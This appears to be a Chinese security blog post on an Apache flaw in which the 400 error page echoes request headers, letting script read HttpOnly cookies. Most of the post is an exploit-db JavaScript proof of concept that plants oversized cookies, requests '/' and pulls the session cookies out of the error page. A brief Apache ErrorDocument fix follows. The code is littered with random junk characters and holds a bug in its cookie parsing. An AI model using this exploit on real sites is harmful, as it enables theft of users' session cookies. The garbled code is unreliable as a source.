很多程序以及一些商业或成熟开源的 CMS 文章系统为了防止 XSS 盗取用户 cookie，一般都给 cookie 加上 HttpOnly 属性，禁止直接用 JS 读取用户 cookie，从而降低 XSS 的危害；而下面这个问题（服务器在 400 错误页中回显了请求头）刚好可以用来绕过 cookie 的 HttpOnly 属性。
用 Chrome 打开一个站点，按 F12 打开开发者工具，切到 Console 输入如下代码并回车：
* E! q1 N+ o5 G: @3 g
4 z$ |- \. k7 }8 l# o7 h' I6 o; _2 u& g, f, j8 o
// http://www.exploit-db.com/exploits/18442/
// Builds and sets (or, with good=true, expires) ten cookies named xss0..xss9.
// With good unset each cookie value is 819 'x' characters, so the ten of
// them together push the request's Cookie header past the server's header
// size limit and provoke the 400 response the page relies on; the same
// loop with good=true expires them again so the browser recovers.
// Note for defenders: it is the server's 400 page echoing the request
// headers, not script access, that leaks the HttpOnly cookies here.
function setCookies (good) {
! e+ o& R+ j$ \// Construct string for cookie value
var str = "";4 ]# ~& ?; t) W; h5 g3 C
// 819 chars x 10 cookies — presumably sized to exceed the default request
// header field limit; the exact threshold depends on server configuration.
for (var i=0; i< 819; i++) {1 S( c( t6 h+ p
str += "x";
& C2 m6 a3 U6 J} }1 L" t( @8 a
// Set cookies
1 B9 C; r3 y2 t |7 yfor (i = 0; i < 10; i++) {( W$ g; n9 w- D
// Expire evil cookie (expiry one millisecond in the past)
; t: B( V* o3 \ d) I( s0 U2 ]if (good) {) N0 d$ Y; W6 y; G! _8 f0 y
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
8 g% P1 T, d8 \- T3 \( S}9 m# C. J* t2 j" g
// Set evil cookie
else {
4 m4 g+ R3 ~8 r' X7 U _& m+ |var cookie = "xss"+i+"="+str+";path=/";
) n$ M# o+ `8 H) w( f2 @}+ s7 l* v1 i) @& s; L+ ?
document.cookie = cookie;9 Z9 Z- y( B. Z& b" a# {6 k
}2 L5 Z9 ]0 p' X$ b. E2 z& a
}
// Entry point of the listing: plants the oversized cookies, issues GET /
// over XHR and hands the response to parseCookies. The interesting reply
// is a 400 whose body echoes the request headers inside <pre> (see the
// Apache security reference at the end of the page); that echo is readable
// by script even though the cookies themselves are HttpOnly.
// Detection hint for operators: a burst of 400 responses to requests with
// oversized Cookie headers from a single client is the observable signal.
3 L5 M- X# |: S2 X$ e8 e" _function makeRequest() {
& X% J: z' C; ]. H" nsetCookies();& C; q9 U( W' u' b% s; p' T
// readystatechange handler; reads xhr from the enclosing scope (declared
// further down with var, so it is hoisted and assigned before any event).
function parseCookies () {
# \4 v% g0 B& q+ v# T1 N& svar cookie_dict = {};
; @' P {9 S$ q; s// Only react on 400 status
9 y8 {& ?' p0 H- {4 kif (xhr.readyState === 4 && xhr.status === 400) {
$ k% R' D6 H3 ~5 J// Replace newlines and match <pre> content
& [- K5 `7 B+ C: Z7 u2 T' Q; A K2 f( Uvar content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);! Z8 u: H, f+ M' L" R
if (content.length) {3 g, x) D3 u% e/ l* k. m) V- |0 ^
// Remove Cookie: prefix
content = content[1].replace("Cookie: ", "");
// Drop the padding cookies this script planted, keep everything else
- x X3 w# Y6 S5 [ nvar cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
3 h% E( O# g/ Y& A$ V7 \( R// Add cookies to object
9 H3 b3 @9 C; s b9 jfor (var i=0; i<cookies.length; i++) {
# X+ R; ?* }: ]' w# ?. ^var s_c = cookies.split('=',2);
& s- J; T, M& l' ]cookie_dict[s_c[0]] = s_c[1];
' S. }' Q* D4 H+ e}* T9 a" h6 O' X% k
}
' l# N- Z& d; C, t* q2 w4 Q// Unset malicious cookies
setCookies(true);
. W& L/ V6 {" }alert(JSON.stringify(cookie_dict));+ R9 C2 R# o8 R1 ]0 |* Y
}) ?, |/ b! l6 \; B& L* Z) B
}
/ H# Z' K1 M/ l- ~2 m# K X _// Make XHR request
7 R, A- t: J+ f3 {* h1 |var xhr = new XMLHttpRequest();) H0 e9 b& {- n, z% _- w
xhr.onreadystatechange = parseCookies;2 q# i! _* e, W* W, U; }" t/ R
xhr.open("GET", "/", true);& _1 |1 P3 [& o3 q' Q a; b- l
xhr.send(null);
" i$ o e, p( u6 _}
// Runs the whole sequence as soon as the snippet is evaluated in the console.
+ y; M3 {" `. n3 y! AmakeRequest();
. U8 |) R6 ?1 I1 ~7 J: \( V3 \2 S4 a( U: e5 ~
你就能看到华丽丽的 400 错误页中包含着 cookie 信息。
下载地址：https://gist.github.com/pilate/1955a1c28324d4724b7b/download#
# T( `% n. m% _4 J9 k6 ^, T! B9 q; N4 Z3 a/ T2 o: b. [7 J
修复方案:
8 D5 r+ B- I+ g4 w
Apache 官方提供 4 种错误处理方式（http://httpd.apache.org/docs/2.0/mod/core.html#errordocument），如下：
3 R0 R5 q* j* X/ @- g: Y2 ~: }& ^9 A' v
In the event of a problem or error, Apache can be configured to do one of four things,
1. output a simple hardcoded error message 输出一个简单生硬的错误信息
2. output a customized message 输出一段自定义信息
3. redirect to a local URL-path to handle the problem/error 转向一个本地的自定义页面
4. redirect to an external URL to handle the problem/error 转向一个外部 URL
- C- t4 G( k) V: c9 n% ^" p& O" ~
经测试，对于 400 错误只有方法 2 有效，返回包不会再包含 cookie 内容。
6 t- B& a/ b2 s6 X6 v, o2 _
Apache 配置：
) E7 v. K v/ B U
ErrorDocument 400 " security test"
+ [5 U, A2 s* S+ O( b; T3 `2 b5 t4 f
当然，升级 Apache 到最新版本也可以 :)。
2 p* H8 w$ X) s* E$ n8 \+ w
参考：http://httpd.apache.org/security/vulnerabilities_22.html
6 V4 T+ \# B4 ]$ n) z2 O |